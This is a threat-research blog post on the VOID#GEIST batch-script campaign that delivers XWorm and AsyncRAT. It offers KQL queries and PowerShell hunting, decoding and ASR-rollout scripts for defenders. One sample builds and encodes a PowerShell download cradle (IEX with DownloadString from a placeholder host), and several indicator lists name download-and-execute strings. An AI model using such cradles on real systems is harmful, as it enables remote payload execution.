Unmasking VOID#GEIST: How Multi-Stage Batch Scripts Are Smuggling XWorm and AsyncRAT
In the ever-evolving landscape of cyber threats, simplicity often serves as the perfect camouflage. While sophisticated zero-days capture the headlines, threat actors frequently return to proven, rudimentary tools to bypass modern defenses. The latest example of this "old-school meets new-school" approach is VOID#GEIST, a multi-stage malware campaign recently disclosed by Securonix Threat Research.
This campaign is not flashy in its delivery, but it is devastatingly effective. By leveraging obfuscated batch scripts—tools that have been part of the Windows operating system for decades—attackers are orchestrating a complex delivery chain for some of the most dangerous Remote Access Trojans (RATs) currently in the wild, including XWorm, AsyncRAT, and Xeno RAT.
The VOID#GEIST Attack Chain Explained
The VOID#GEIST campaign begins, as many do, with a phishing lure or a malicious download designed to trick the user into executing a script. However, instead of a macro-laden document or a PowerShell one-liner, the initial payload is a batch script (.bat or .cmd).
At first glance, these scripts may appear benign or simply cluttered with garbage data. That clutter is deliberate obfuscation, designed to confuse both human analysts and automated scanning engines.
Stage 1: The Batch File Dropper
The batch script serves as the "loader." Its primary function is to prepare the environment for the subsequent stages. This often involves:
- Disabling Security Controls: Modifying registry keys or utilizing built-in utilities to temporarily disable Windows Defender or other AV solutions.
- Establishing Persistence: Creating scheduled tasks or modifying startup folders to ensure the malware survives a reboot.
- Downloading the Payload: The script reaches out to a command-and-control (C2) server to retrieve the next stage.
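The three loader behaviours above each leave artefacts a defender can enumerate. The following PowerShell is an added example, not code from the original post or from the Securonix research: it walks scheduled tasks, Run/RunOnce keys and the Startup folders and flags any entry that launches cmd.exe or a .bat/.cmd file from a user-writable location. The path list and both regular expressions are assumptions chosen for illustration and should be tuned to your own environment.

```powershell
# Added example (not part of the original post or the Securonix research): hunt for persistence
# entries that launch cmd.exe or a .bat/.cmd file from user-writable locations.
# The path list and both regexes are assumptions chosen for illustration; tune them to your estate.

$SuspectPath = '(?i)\\(Downloads|AppData\\Local\\Temp|ProgramData|Users\\Public)\\'
$SuspectExec = '(?i)(cmd\.exe|\.bat\b|\.cmd\b)'

function Test-SuspiciousLaunch {
    param([string]$CommandText)
    # A launch string is suspicious when it runs a batch/cmd artefact from a user-writable path
    return ($CommandText -match $SuspectExec) -and ($CommandText -match $SuspectPath)
}

# 1. Scheduled tasks: inspect the executable and arguments of every action
$TaskHits = Get-ScheduledTask -ErrorAction SilentlyContinue | ForEach-Object {
    $Task = $_
    foreach ($Action in $Task.Actions) {
        $Launch = "$($Action.Execute) $($Action.Arguments)"
        if (Test-SuspiciousLaunch $Launch) {
            [PSCustomObject]@{
                Source = 'ScheduledTask'
                Name   = "$($Task.TaskPath)$($Task.TaskName)"
                Launch = $Launch.Trim()
                Author = $Task.Author
            }
        }
    }
}

# 2. Run/RunOnce keys for the machine and the current user
$RunKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)
$RegHits = foreach ($Key in $RunKeys) {
    $Props = Get-ItemProperty -Path $Key -ErrorAction SilentlyContinue
    if (-not $Props) { continue }
    foreach ($Prop in $Props.PSObject.Properties) {
        if ($Prop.Name -like 'PS*') { continue }   # skip PSPath, PSParentPath and friends
        $Value = [string]$Prop.Value
        if (Test-SuspiciousLaunch $Value) {
            [PSCustomObject]@{
                Source = 'RunKey'
                Name   = "$Key\$($Prop.Name)"
                Launch = $Value
                Author = $null
            }
        }
    }
}

# 3. Startup folders: any batch file dropped here is worth a look regardless of its path
$StartupDirs = @(
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup",
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
)
$StartupHits = Get-ChildItem -Path $StartupDirs -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Extension -in '.bat', '.cmd' } |
    ForEach-Object {
        [PSCustomObject]@{
            Source = 'StartupFolder'
            Name   = $_.Name
            Launch = $_.FullName
            Author = (Get-Acl $_.FullName).Owner
        }
    }

@($TaskHits) + @($RegHits) + @($StartupHits) | Format-Table -AutoSize
```

Run it in an elevated session so the HKLM keys and every task folder are readable; HKCU only covers the interactive user, so on a shared host repeat the Run-key check against each loaded user hive under HKEY_USERS.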
Stage 2: The Encrypted RATs
What makes VOID#GEIST particularly potent is its use of encryption. The payloads delivered by the batch script are encrypted, making signature-based detection extremely difficult. Once downloaded, the script (or a subsequent PowerShell command it invokes) decrypts the payload in memory before executing it.
The "stars of the show" are the RATs:
- XWorm: A versatile malware capable of DDoS attacks, cryptocurrency mining, and data theft.
- AsyncRAT: Known for its robust remote control capabilities, allowing attackers to silently take over a victim's machine.
- Xeno RAT: A newer entrant focusing on evasion and persistence, often bypassing UAC (User Account Control).
Technical Analysis and TTPs
The Tactics, Techniques, and Procedures (TTPs) employed by VOID#GEIST highlight a shift toward "living-off-the-land" (LotL) tactics. By using cmd.exe and legitimate PowerShell commands to decrypt and load malware, the attackers blend in with normal administrative traffic.
A critical aspect of this campaign is the use of reflective loading or process hollowing to inject the RAT payload into a legitimate process (such as explorer.exe or regsvr32.exe). This further masks the malicious activity, because the process hosting the RAT looks legitimate on casual inspection.
Detection and Threat Hunting
Detecting VOID#GEIST requires looking beyond the initial file hash. Since the batch scripts are heavily obfuscated and the payloads are encrypted, we must hunt for behavioral anomalies.
KQL Queries (Microsoft Sentinel/Defender)
Use the following KQL query to hunt for suspicious child processes spawned by cmd.exe that exhibit behavior consistent with VOID#GEIST, specifically looking for interactions with PowerShell that involve Base64 encoding or web requests.
DeviceProcessEvents
| where InitiatingProcessFileName == "cmd.exe"
| where FileName in~ ("powershell.exe", "powershell_ise.exe", "mshta.exe")
| where ProcessCommandLine has_any ("DownloadString", "IEX", "Invoke-Expression", "FromBase64String")
| project Timestamp, DeviceName, InitiatingProcessCommandLine, ProcessCommandLine, AccountName
| order by Timestamp desc
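One caveat on the query above: has_any inspects the raw ProcessCommandLine, so a PowerShell invocation that carries its script as a -EncodedCommand argument will not contain the strings DownloadString or IEX in clear text and will slip past the filter. The PowerShell below is an added example, not code from the original post or the Securonix research: it decodes any -EncodedCommand payload in a command line and checks both the raw line and the decoded text for the same indicator strings. The sample command lines are constructed for illustration, not captured from the campaign, and example.invalid is a placeholder host.

```powershell
# Added example (not part of the original post): decode any -EncodedCommand argument in a
# process command line and test the decoded text for the same indicators the KQL query uses.
# The sample command lines below are constructed for illustration, not captured from the campaign.

$Indicators = @('DownloadString', 'IEX', 'Invoke-Expression', 'FromBase64String', 'Net.WebClient')

function Expand-EncodedCommand {
    param([string]$CommandLine)
    # powershell.exe accepts -e, -ec, -enc or -EncodedCommand; the payload is Base64 of UTF-16LE text
    if ($CommandLine -match '(?i)\s-e(?:c|nc|ncodedcommand)?\s+(?<b64>[A-Za-z0-9+/=]{16,})') {
        try {
            return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches['b64']))
        } catch {
            return $null   # not valid Base64; leave the raw value for the analyst
        }
    }
    return $null
}

function Get-CommandLineIndicators {
    param([string]$CommandLine)
    $Decoded = Expand-EncodedCommand $CommandLine
    # Drop long Base64 runs from the raw line so a chance substring inside the blob cannot match
    $Text = ($CommandLine -replace '[A-Za-z0-9+/=]{40,}', '<base64>') + "`n" + $Decoded
    $Hits = @($Indicators | Where-Object { $Text -match [regex]::Escape($_) })
    [PSCustomObject]@{
        CommandLine = $CommandLine
        Decoded     = $Decoded
        Indicators  = ($Hits -join ', ')
        Suspicious  = ($Hits.Count -gt 0)
    }
}

function ConvertTo-EncodedArgument {
    param([string]$Script)
    [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Script))
}

# Constructed samples: an encoded but benign administrative command, an encoded download
# cradle built from the indicator strings, and a plain script invocation
$Benign = 'Get-Service -Name Spooler | Select-Object Status'
$Cradle = 'IEX (New-Object Net.WebClient).DownloadString("http://example.invalid/stage2.txt")'
$Samples = @(
    "powershell.exe -NoProfile -EncodedCommand $(ConvertTo-EncodedArgument $Benign)",
    "powershell.exe -w hidden -enc $(ConvertTo-EncodedArgument $Cradle)",
    'powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1'
)

# Run all three samples through the checker
$Samples | ForEach-Object { Get-CommandLineIndicators $_ } | Format-List
```

The same decode step can be applied to exported DeviceProcessEvents rows before filtering, so that the has_any logic in the query runs against the decoded script rather than the opaque Base64 blob.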
Additionally, monitor for the creation of batch files in suspicious directories:
DeviceFileEvents
| where FileName endswith ".bat"
| where FolderPath contains "Downloads" or FolderPath contains "AppData\\Local\\Temp"
| project Timestamp, DeviceName, FileName, FolderPath, InitiatingProcessAccountName
| order by Timestamp desc
PowerShell Hunting Script
Analysts can run the following PowerShell script on endpoints to identify recently created or modified batch files that contain high-risk obfuscation patterns.
# Locations where user-dropped loaders typically land, and content patterns that indicate obfuscation
$Paths = @("C:\Users\*\Downloads", "C:\Users\*\AppData\Local\Temp", "C:\ProgramData")
$RiskPatterns = @("powershell -e", "iex(", "DownloadString", "base64")
# Check .cmd as well as .bat, since the loader can use either extension
Get-ChildItem -Path $Paths -Include *.bat, *.cmd -Recurse -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } |
    ForEach-Object {
        $Content = Get-Content $_.FullName -Raw -ErrorAction SilentlyContinue
        foreach ($Pattern in $RiskPatterns) {
            # -match takes a regex, so escape the pattern: "iex(" on its own is an invalid
            # regex and would abort the scan with a parse error
            if ($Content -match [regex]::Escape($Pattern)) {
                [PSCustomObject]@{
                    File           = $_.FullName
                    LastWrite      = $_.LastWriteTime
                    MatchedPattern = $Pattern
                    User           = (Get-Acl $_.FullName).Owner
                }
            }
        }
    }
Mitigation Strategies
To defend against the VOID#GEIST campaign and similar multi-stage threats, organizations must adopt a defense-in-depth approach:
- Strict Application Control: Use AppLocker or Windows Defender Application Control (WDAC) to prevent unsigned batch files and scripts from running in user directories like Downloads or Temp.
- Disable PowerShell for Non-Admins: Restrict PowerShell access to only administrative users who require it for their daily tasks.
- Attack Surface Reduction (ASR) Rules: Enable ASR rules specifically:
- "Block all Office applications from creating child processes"
- "Block JavaScript or VBScript from launching downloaded executable content"
- User Awareness: Train employees to recognize social engineering attempts. The initial infection vector is almost always a user tricked into running the "loader."
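The two ASR rules named above can be staged safely by enabling them in audit mode first and reviewing what they would have blocked before switching to enforcement. The PowerShell below is an added example, not code from the original post or the Securonix research. The rule GUIDs are Microsoft's published identifiers for these two rules; the mapping of Get-MpPreference's numeric action codes to names is an assumption stated in the code.

```powershell
# Added example (not part of the original post): enable the two ASR rules named above in audit
# mode first, then read back their effective state. The rule GUIDs are Microsoft's published
# identifiers for these rules; the action-code mapping follows Get-MpPreference's numeric output.

$AsrRules = @{
    'D4F940AB-401B-4EFC-AADC-AD5F3C50688A' = 'Block all Office applications from creating child processes'
    'D3E037E1-3EB8-44C8-A917-57927947596D' = 'Block JavaScript or VBScript from launching downloaded executable content'
}
# Get-MpPreference reports each rule's action as an integer
$ActionNames = @{ 0 = 'Disabled'; 1 = 'Block'; 2 = 'Audit'; 6 = 'Warn' }

function Set-AsrRuleMode {
    param(
        [string]$RuleId,
        [ValidateSet('AuditMode', 'Enabled', 'Disabled', 'Warn')]
        [string]$Mode = 'AuditMode'
    )
    # Add-MpPreference merges into the existing rule list rather than replacing it
    Add-MpPreference -AttackSurfaceReductionRules_Ids $RuleId -AttackSurfaceReductionRules_Actions $Mode
}

function Get-AsrRuleState {
    $Pref    = Get-MpPreference
    $Ids     = @($Pref.AttackSurfaceReductionRules_Ids)
    $Actions = @($Pref.AttackSurfaceReductionRules_Actions)
    foreach ($RuleId in $AsrRules.Keys) {
        $State = 'Not configured'
        for ($i = 0; $i -lt $Ids.Count; $i++) {
            if ($Ids[$i] -ieq $RuleId) { $State = $ActionNames[[int]$Actions[$i]]; break }
        }
        [PSCustomObject]@{ Rule = $AsrRules[$RuleId]; Id = $RuleId; State = $State }
    }
}

# Roll out in audit mode, review the resulting ASR audit events (Event ID 1122 in the
# Microsoft-Windows-Windows Defender/Operational log), then re-run with -Mode Enabled to block
foreach ($RuleId in $AsrRules.Keys) { Set-AsrRuleMode -RuleId $RuleId -Mode AuditMode }
Get-AsrRuleState | Format-Table -AutoSize
```

Run this from an elevated session on a pilot group before fleet-wide rollout; the Office child-process rule in particular can interrupt legitimate add-ins, and the audit events show exactly which parent/child pairs would be affected.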